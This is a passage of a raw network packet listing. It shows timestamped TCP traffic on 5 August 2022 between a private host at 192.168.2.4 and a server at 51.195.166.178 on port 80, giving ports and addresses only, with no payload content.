Aug 5, 2022 13:54:13.213404894 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.213427067 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.213452101 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.213474035 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.213505030 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.213510036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.213577032 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.213577986 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.213614941 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.213650942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.213671923 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.213685989 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.213722944 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.213758945 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.213773012 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.213794947 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.213799000 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.213819981 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.213831902 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.213869095 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.213893890 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.213903904 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.213938951 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.213960886 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.213974953 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214009047 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214030981 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214044094 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214078903 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214102030 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214114904 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214152098 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214175940 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214185953 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214224100 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214243889 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214258909 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214293957 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214329004 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214363098 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214380980 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214401960 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214411020 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214426041 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214430094 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214461088 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214505911 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214540005 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214570045 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214607000 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214641094 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214652061 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214677095 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214698076 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214715958 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214720011 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214750051 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214771032 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214803934 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214811087 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214835882 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214852095 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214884996 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214920998 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214930058 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214963913 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.214967012 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214976072 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.214998007 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215009928 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.215033054 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215056896 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.215069056 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215104103 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215126038 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.215138912 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215173960 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215193033 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.215213060 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215250015 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215265989 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.215284109 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215318918 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215332031 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.215389013 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215425968 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215440035 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.215460062 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215495110 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215519905 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.215589046 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215630054 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215656042 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.215667009 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215703011 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215739012 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215747118 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.215763092 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.215774059 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215810061 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215817928 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.215835094 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.215846062 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215867996 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.215883017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215907097 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.215919018 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215965033 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.215984106 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216020107 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216029882 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.216048956 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.216057062 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216069937 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.216092110 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216118097 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.216129065 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216165066 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216200113 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216232061 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.216236115 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216252089 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.216269016 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216300011 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.216305017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216324091 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.216340065 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216376066 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216399908 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.216413021 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216448069 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216470003 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.216483116 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216521025 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216545105 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.216553926 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216589928 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216613054 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.216625929 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216660976 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216687918 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.216697931 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216732025 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216758013 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.216767073 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216804028 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216828108 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.216836929 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216872931 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216901064 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.216908932 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216944933 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.216968060 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.216980934 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217015028 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217051029 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217080116 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.217087030 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217119932 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217154980 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217175961 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.217190027 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.217190027 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217226982 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217258930 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.217264891 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217299938 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217322111 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.217334986 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217370033 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217390060 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.217403889 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217439890 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217459917 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.217474937 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217509985 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217538118 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.217547894 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217581034 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217612982 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.217617035 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217652082 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217685938 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217694044 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.217722893 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217751026 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217787027 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217802048 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.217820883 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.217823029 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217853069 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.217856884 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217892885 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217921972 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.217936993 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217974901 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.217998028 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.218010902 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.218046904 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.218080997 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.218082905 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.218101025 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.218121052 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.218154907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.218190908 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.218225002 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.218259096 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.218293905 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.218300104 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.218328953 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.218334913 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.218341112 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.218637943 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.247728109 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.247790098 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.247833967 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.247874975 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.247916937 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.247956991 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.247997999 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.247997046 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.248028040 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.248030901 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.248044968 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248090029 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248100996 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.248135090 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248181105 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248224020 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248255968 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.248264074 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.248266935 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248298883 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.248310089 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248339891 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.248353004 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248395920 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248425007 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.248436928 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248480082 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248503923 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.248527050 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248568058 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248593092 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.248609066 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248650074 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248673916 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.248692036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248734951 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248759985 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.248778105 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248821020 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248846054 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.248867035 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248907089 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248936892 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.248950005 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.248992920 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249021053 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.249032021 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249073029 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249088049 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.249126911 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249167919 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249176979 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.249212980 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249254942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249263048 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.249299049 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249342918 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249351025 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.249385118 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249428034 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249437094 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.249471903 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249511957 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249537945 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.249558926 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249602079 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249627113 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.249645948 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249690056 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249696970 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.249731064 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249773026 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249780893 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.249816895 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249871016 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.249878883 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249928951 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.249955893 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.249963045 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.249969959 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250011921 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250014067 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.250045061 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.250055075 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250097990 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250140905 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250159025 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.250185013 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250224113 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250241995 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.250271082 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250312090 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250329971 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.250354052 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250395060 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250406981 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.250437021 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250478983 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250497103 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.250521898 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250565052 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250577927 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.250608921 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250649929 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250664949 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.250690937 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250732899 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250747919 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.250776052 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250816107 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250828028 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.250863075 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250901937 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250919104 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.250943899 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250987053 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.250999928 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.251029968 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251071930 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251090050 CEST	49778	80	192.168.2.4	51.195.166.178
